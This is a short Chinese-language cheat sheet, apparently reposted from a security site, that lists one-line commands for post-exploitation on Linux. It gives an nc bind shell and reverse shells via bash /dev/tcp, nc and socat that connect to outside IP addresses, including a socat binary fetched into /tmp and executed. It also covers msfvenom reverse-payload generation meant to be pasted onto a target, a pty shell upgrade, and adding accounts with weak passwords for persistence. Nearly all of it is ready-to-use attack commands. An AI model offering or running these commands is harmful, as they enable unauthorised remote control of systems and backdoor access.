1 nc开启本地监听发布bash服务

1    # nc -lvvp 12345 -t -e /bin/bash    

2 常用反弹shell一句话

(1) bash 反弹一句话
1    # bash -i >& /dev/tcp/192.168.1.123/12345 0>&1    

(2) nc 反弹一句话
1    # nc 192.168.1.123 12345 -t -e /bin/bash    

(3) socat 反弹一句话
123    # wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat      # 第一步:下载socat到/tmp目录下# chmod 755 /tmp/socat          # 第二步:给socaat授予可以执行权限# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.41:12345        # 第三步:反弹shell到目标主机的12345端口    

3 利用msfvenom获取反弹一句话

(1) 查询 reverse payload 反弹路径
1    # msfvenom -l payloads 'cmd/unix/reverse'    

(2) 生成相关反弹一句话
1    # msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R    

剩下的就是将生成的payload 反弹一句话直接复制到靶机上直接运行即反弹一个shell出来。

4 使用python获取标准shell

直接在获取的废标准shell上直接运行一下python 一句话即可获取一个标准的shell。
1    # python -c "import pty;pty.spawn('/bin/bash')"    

5 linux 一句话添加账户
(1)chpasswd 方法
1    # useradd guest;echo 'guest:123456'|chpasswd    

(2)useradd -p 方法
1    # useradd -p `openssl passwd 123456` guest    

(3)echo -e 方法
1    # useradd test;echo -e "123456\n123456\n" |passwd test

【转】http://bobao.360.cn/learning/detail/4551.html